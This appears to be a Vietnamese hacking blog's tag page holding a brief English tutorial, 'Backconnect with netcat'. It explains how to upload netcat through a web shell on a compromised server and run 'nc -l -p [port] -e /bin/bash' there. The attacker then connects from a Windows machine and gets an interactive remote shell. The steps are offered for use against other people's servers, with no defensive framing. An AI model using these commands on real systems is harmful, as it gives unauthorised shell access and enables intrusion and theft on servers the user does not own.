Hiển thị các bài đăng có nhãn Backconnect. Hiển thị tất cả bài đăng
Hiển thị các bài đăng có nhãn Backconnect. Hiển thị tất cả bài đăng

[Tutorial]Backconnect with netcat

1.Download

netcat windows-http://anonym.to/?http://joncraton.o...at-for-windows
nc to upload with shell-http://www.multiupload.nl/TOBD6TAOXE

2.Upload nc with shell

[IMG]
3.set chmod 777 for nc[IMG]
4.run command ./nc -vv -l -p [port] -e /bin/bash at shell


5.open cmd direct to where nc save like this cd c:\
and run this command
nc -vv [ip target] [port]
[IMG]

6.now you have back connect it

[IMG]

Xem Thêm

 

Copyright © Dương-UG Blog's - Nguyễn Bình Dương